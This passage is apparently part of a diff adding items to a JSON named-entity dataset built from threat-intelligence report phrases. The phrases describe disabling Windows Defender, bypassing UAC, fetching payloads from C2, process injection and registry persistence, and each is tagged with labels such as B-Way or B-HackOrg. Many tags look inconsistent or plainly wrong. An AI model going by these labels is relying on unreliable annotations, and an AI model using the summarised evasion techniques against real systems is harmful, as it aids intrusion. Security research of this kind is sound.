"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sets", + "Network", + "Protection", + "to", + "audit", + "mode", + "in", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "MAPS", + "(Microsoft", + "Active", + "Protection", + "Service)", + "reporting" + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "Allows", + "severe/high/moderate/low-level", + "threats", + "to", + "execute" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "the", + "\"administrator", + "in", + "Admin", + "Approval", + "Mode\"", + "user", + "type", + "(disables", + "UAC", + "prompts)" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stops", + "the", + "WinDefend", + "service", + "(Windows", + "Defender)" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Disables", + "the", + "startup", + "of", + "the", + "WinDefend", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deletes", + "the", + "WinDefend", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stops", + "the", + "Microsoft", + "Defender", + "Antivirus", + "Network", + "Inspection", + "Service", + "(WdNisSvc)" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "designed", + "to", + "hamper", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "fool", + "potential", + "victims", + "into", + "opening", + "them." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "users", + "still", + "need", + "to", + "manually", + "mount", + "them", + "and", + "run", + "the", + "fake", + "PDFs", + "to", + "trigger", + "the", + "infection", + "chain" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Manually", + "executing", + "the", + "lnk", + "file", + "triggers" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Manual", + "interactions", + "are", + "required" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "lot", + "of", + "junk", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "taking", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "load", + "a", + "binary", + "into", + "memory", + "that", + "injects" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "modify", + "group", + "policy", + "for", + "privilege", + "escalation", + "and", + "defense", + "evasion" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Idus", + "B-Purp" + ] + }, + { + "tokens": [ + "can", + "modify", + "group", + "policy", + "for", + "privilege", + "escalation", + "and", + "defense", + "evasion." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Purp", + "O", + "B-Idus", + "B-Purp" + ] + }, + { + "tokens": [ + "Attempts", + "to", + "delete", + "malicious", + "batch", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "makes", + "modifications", + "to", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adds", + "a", + "custom", + "icon", + "to", + "the", + "registry," + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "modifies", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "registry", + "key", + "HKCU\\Control", + "Panel\\Desktop" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "Windows", + "Defender", + "with", + "batch", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "batch", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "batch", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "Mimikatz", + "to", + "dump", + "passwords." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "GetComputerName", + "to", + "query", + "the", + "computer", + "name." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "used", + "RDP", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "installed", + "and", + "used", + "legitimate", + "tools", + "such", + "as", + "TeamViewer", + "and", + "AnyConnect", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "iterate", + "through", + "the", + "entire", + "file", + "system," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Victims", + "receive", + "spear", + "phishing", + "emails", + "with", + "attached", + "malicious", + "zip", + "files" + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encoded", + "PowerShell", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scripts", + "to", + "download", + "additional", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "benign-looking", + "services", + "for", + "the", + "ransomware", + "binary." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "benign-looking", + "services", + "for", + "the", + "ransomware", + "binary." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lists", + "internal", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "installed", + "and", + "used", + "PsExec", + "to", + "execute", + "payloads", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malicious", + "actors", + "typically", + "gain", + "entry", + "to", + "organizations’", + "Microsoft", + "365", + "environments", + "by", + "abusing", + "either", + "stolen", + "account", + "credentials" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "actors", + "behaving", + "in", + "predictable", + "ways", + "once", + "they", + "gain", + "access", + "to", + "customer", + "Microsoft", + "365", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Actor", + "signs", + "in", + "to", + "a", + "Microsoft", + "365", + "account", + "from", + "an", + "endpoint" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "actor", + "signing", + "in", + "to", + "a", + "Microsoft", + "365", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "the", + "actor", + "took", + "after", + "logging", + "in", + "to", + "a", + "user’s", + "Microsoft", + "365", + "account" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "malicious", + "actor", + "was", + "observed", + "signing", + "in", + "to", + "a", + "Microsoft", + "365", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "began", + "with", + "an", + "actor", + "signing", + "into", + "an", + "internal", + "user’s", + "Microsoft", + "365", + "account", + "from", + "a", + "VPN" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "spoof", + "of", + "the", + "legitimate", + "‘PerfectData’", + "software", + "designed", + "to", + "masquerade", + "a", + "malicious", + "application", + "as", + "legitimate" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "brute-force", + "activity" + ], + "ner_tags": [ + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "The", + "emails", + "included", + "an", + "attachment", + "named", + "‘Credit", + "Transfer", + "Copy.html’" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "capable", + "of", + "modifying", + "Windows", + "UAC", + "prompt,", + "disabling", + "Windows", + "Defender", + "notifications,", + "disabling", + "Task", + "Manager,", + "disabling", + "command", + "prompt,", + "preventing", + "users", + "from", + "accessing", + "Windows", + "registry", + "tools,", + "disabling", + "the", + "Run", + "command,", + "and", + "modifying", + "the", + "display", + "timeout" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "B-HackOrg", + "B-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "performing", + "antivirus", + "tampering" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "script", + "retrieves", + "NSudo", + "and", + "modifies", + "Windows", + "UAC", + "prompt", + "behavior", + "by", + "allowing", + "administrators", + "to", + "perform", + "operations", + "without", + "authentication", + "or", + "consent", + "prompts" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disabling", + "Windows", + "Defender", + "notifications,", + "Disabling", + "Task", + "Manager,", + "Disabling", + "command", + "prompt,", + "Preventing", + "users", + "from", + "accessing", + "Windows", + "registry", + "tools,", + "Disabling", + "Run", + "command,", + "Modifying", + "the", + "display", + "timeout" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actor(s)", + "made", + "sure", + "to", + "add", + "more", + "paths", + "and", + "folders", + "to", + "Windows", + "Defender", + "exclusion", + "including", + "%TEMP%", + "and", + "C:\\Windows\\*", + "as", + "well", + "as", + "adding", + ".ps1", + "(PowerShell)", + "extension", + "to", + "the", + "exclusion", + "list." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disabling", + "Windows", + "Defender", + "notifications,", + "Task", + "Manager", + "and", + "Command", + "Prompt" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "recursively", + "removes", + "the", + "implementation", + "of", + "Windows", + "Defender", + "IOfficeAntiVirus" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "then", + "adds", + "the", + "extensions", + "such", + "as", + "exe", + "and", + "DLL", + "as", + "exclusions", + "to", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "performs", + "the", + "antivirus", + "checks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "checks", + "the", + "host", + "against", + "the", + "list", + "of", + "antiviruses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "antivirus", + "check", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "the", + "malicious", + "update.bat", + "file", + "from", + "the", + "C2", + "domain" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "the", + "capability", + "of", + "sending", + "additional", + "payloads", + "to", + "the", + "hosts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "pulling", + "additional", + "BatLoader", + "payloads", + "and", + "scripts", + "from", + "C2" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "retrieves", + "the", + "same", + "files", + "from", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executing", + "scripts", + "and", + "commands", + "retrieved", + "from", + "C2", + "such", + "as", + "ps1,", + "bat,", + "vbs,", + "and", + "exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "script", + "retrieves", + "the", + "Cobalt", + "Strike", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "retrieves", + "and", + "executes", + "the", + "runanddelete.bat", + "and", + "scripttodo.ps1", + "scripts", + "from", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "the", + "full", + "set", + "of", + "malware", + "is", + "retrieved", + "from", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "retrieving", + "malware", + "from", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "was", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file", + "to", + "run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "username" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "username" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "username" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "obtains", + "all", + "entries", + "within", + "the", + "IPs", + "starting", + "with", + "192.,", + "10.,", + "and", + ".172", + "in", + "the", + "ARP", + "cache", + "table" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "then", + "checks", + "the", + "amount", + "of", + "IPs", + "found", + "in", + "the", + "ARP", + "table" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ARP", + "table" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "GPG-encrypted", + "files:" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "strings", + "reside", + "within", + "the", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "data", + "stored", + "in", + "the", + "BSS", + "section", + "is", + "encoded" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encoded", + "data", + "in", + "the", + "BSS", + "section" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "on", + "the", + "API", + "calls", + "QueryPerformanceFrequency", + "and", + "QueryPerformanceCounter" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "from", + "API", + "call", + "GetSystemTimeAsFileTime" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "using", + "the", + "API" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "traffic", + "beaconing", + "contains", + "the", + "following", + "pattern", + "that", + "will", + "be", + "encrypted", + "with", + "the", + "AES", + "key", + "extracted", + "from", + "the", + "compressed", + "blob" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "with", + "AES-128", + "beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OS", + "version", + "and", + "system", + "type" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "screenshot" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "then", + "collects", + "the", + "credentials,", + "host", + "information,", + "files," + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Syncro", + "RMM", + "is", + "a", + "Remote", + "Monitoring", + "and", + "Management", + "tool", + "used", + "to", + "control", + "and", + "manage", + "devices", + "remotely." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "tool", + "can", + "be", + "used", + "as", + "a", + "persistence", + "mechanism", + "and", + "remote", + "accessing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Syncro", + "RMM", + "can", + "also", + "be", + "used", + "as", + "a", + "persistence", + "mechanism" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leverages", + "SOCKS5" + ], + "ner_tags": [ + "O", + "B-Way" + ] + }, + { + "tokens": [ + "leverages", + "SOCKS5", + "proxies", + "to", + "hide", + "malicious", + "traffic" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "task", + "scheduling" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "proceeds", + "with", + "scheduled", + "task", + "creation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "the", + "scheduled", + "task", + "every", + "2", + "minutes", + "is", + "start." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "the", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "the", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "words", + "are", + "used", + "to", + "build", + "the", + "registry", + "value", + "names." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "recursively", + "removes", + "the", + "implementation", + "of", + "Windows", + "Defender", + "IOfficeAntiVirus", + "under", + "HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "enables", + "the", + "data", + "transfer", + "with", + "URL", + "syntax", + "for", + "protocols", + "such", + "as", + "HTTP/HTTPS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "runs", + "it", + "via", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "injects", + "itself", + "into", + "explorer.exe" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "injecting", + "itself", + "into", + "a", + "running", + "explorer.exe", + "process." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "injecting", + "itself", + "into", + "a", + "running", + "explorer.exe", + "process" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "performs", + "process", + "injection", + "using", + "the", + "API", + "such", + "as", + "OpenThread", + "(to", + "create", + "a", + "handle", + "to", + "an", + "existing", + "process),", + "VirtualAlloc", + "(memory", + "allocation", + "in", + "the", + "chosen", + "process),", + "and", + "QueueUserAPC,", + "the", + "thread", + "that", + "the", + "APC", + "(Asynchronous", + "Procedure", + "Calls)", + "is", + "queued", + "to", + "has", + "to", + "enter", + "an", + "alertable", + "state" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "accessing", + "browser", + "credentials", + "and", + "cookies,", + "Thunderbird", + "and", + "Outlook", + "profiles" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "creates", + "the", + "persistence", + "via", + "Registry", + "Run", + "Keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "creates", + "a", + "persistence", + "via", + "Registry", + "Run", + "Keys", + "under", + "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "it", + "stores", + "three", + "embedded", + "binaries", + "within", + "the", + "unpacked", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "compressed", + "binaries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compressed", + "binary" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "unpacked", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "binaries", + "are", + "compressed", + "using", + "APLib", + "compression", + "algorithm." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + "unpacked", + "sample", + "is", + "approximately", + "540", + "KB" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "unpacked", + "sample", + "is", + "approximately", + "540", + "KB" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decompress", + "data", + "blobs" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decompress", + "them" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decompression", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypted", + "strings" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Decompiled", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "function", + "in", + "Python" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "function" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APLib", + "decompression", + "function" + ], + "ner_tags": [ + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "them" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "function", + "is", + "shown", + "below,", + "the", + "decryption", + "function", + "can", + "be", + "represented", + "as", + "the", + "following", + "pseudocode:" + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "GPG", + "decryption", + "routine" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "GPG", + "decryption" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "wmic" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "query" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "that", + "pulls", + "the", + "written", + "data", + "from", + "the", + "registry", + "under", + "HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\<registry_value>>" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "Tor", + "communication", + "capability" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Configured", + "for", + "WMI", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "WMI", + "Persistence" + ], + 